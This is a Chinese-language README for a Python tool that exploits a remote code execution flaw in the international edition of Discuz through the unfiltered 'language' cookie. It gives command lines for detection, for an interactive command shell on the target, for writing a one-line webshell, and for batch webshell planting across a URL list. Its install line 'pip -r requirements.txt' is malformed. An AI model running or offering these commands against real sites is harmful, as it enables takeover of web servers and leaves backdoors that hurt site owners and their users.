Discuz ML RCE漏洞检测工具

Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤，导致可以远程代码执行。本工具支持单url和批量检测，有判断模式（只判断有无该漏洞）、cmdshell模式（返回简单的cmd shell）和getshell模式（写入一句话木马）。

下载

python2.7

git clone https://github.com/theLSA/discuz-ml-rce.git
pip -r requirements.txt

使用

使用时加上漏洞PHP页面（如forum.php,portal.php），直接写域名可能会重定向导致误报。

• 使用帮助：python dz-ml-rce.py -h
• 判断模式：python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" 
• cmdshell模式：python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --cmdshell
• getshell模式：python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --getshell
• 批量检测：python dz-ml-rce.py -f urls.txt
• 批量getshell：python dz-ml-rce.py -f urls.txt --getshell